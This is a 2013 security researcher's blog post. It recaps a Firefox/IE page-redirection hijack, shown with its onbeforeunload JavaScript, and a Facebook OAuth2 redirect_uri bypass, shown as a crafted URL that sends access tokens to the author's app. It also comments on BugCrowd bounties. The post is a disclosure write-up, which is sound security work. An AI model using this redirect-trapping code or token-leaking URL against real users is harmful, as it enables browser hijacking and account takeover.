To keep a record of the little things I have done since my last blog post:
1- IE/Firefox – Page Redirection Hijack
Several weeks ago, I reported an interesting PoC via my Twitter in which I had created a web page that stops Firefox and IE browsers to redirect users to their intended destination even if they had typed it directly in the address bar: https://twitter.com/irsdl/status/294239415428067329
This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advert companies are currently exploiting this issue as well. I have already reported it to Mozilla: https://bugzilla.mozilla.org/show_bug.cgi?id=839470
Example 1: No Redirection Ever: http://0me.me/demo/mozilla/firefox/UnRedirectablePage.html
Here is the Javascript code that does this:
window.onbeforeunload = function(){ //Unredirectable Page setTimeout("window.location=document.location;alert('delay by alert');",0); }
Example 2: This always redirects you to secproject.com:Â Â http://0me.me/demo/mozilla/firefox/RedirectToSecProject.html
Here is the Javascript code that does this:
window.onbeforeunload = function(){ //Unredirectable Page setTimeout("window.location='http://www.secproject.com';alert('delay by alert');",0); }
2- Facebook OAuth2 Bypass
Facebook OAuth2Â yet another redirection bypass! I only found one issue which was very similar to what Nir Goldshlager (www.nirgoldshlager.com) and Egor Homakov (homakov.blogspot.co.uk) had reported to Facebook. I highly recommend their blog posts about Facebook Oauth2 for reading and learning!
Here is what I have found in Facebook:
The following URL could send your sessions to attacker’s domain and he could hijack your OAuth token: Link
https://www.facebook.com/dialog/oauth?client_id=210831918949520&response_type=token&scope=,,,,&redirect_uri=https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523
It used to work in all the browsers. However, you needed to find an authorised Facebook app in order to be able to exploit this issue.
A short description:
– “/////” in the URL -> to bypass IE problem with Facebook redirection
– “candycrush1” -> to redirect the user to a normal user page instead of candycrush game! “https://apps.facebook.com/candy.crush1” takes you to a user page instead of an App!
– “%2523” and “%23” -> to remove # in the final URL and send the token directly in the URL.
The result of loading that URL was:
http://apps.facebook.com/testrdirsdl/&access_token=BlahBlahBlah&expires_in=5033
in which “testrdirsdl” is my app that can store the tokens in “http://www.secproject.com/demo/showmyinfo.php” (it does not have logging functionality at the moment!)
3- BugCrowd!
I attended several BugCrowd.com bounties and gladly received $$$ for private and public bounties! I liked the charity ones as well :-)
If you want to test live and different websites without having legal obligations (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to the people who want to have fun and increase their web app. security testing skills.
Unfortunately, the recent bounties from BugCrowd did not have fair prizes and I guess it is because of the companies budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!
That’s it for now. Thanks for your time.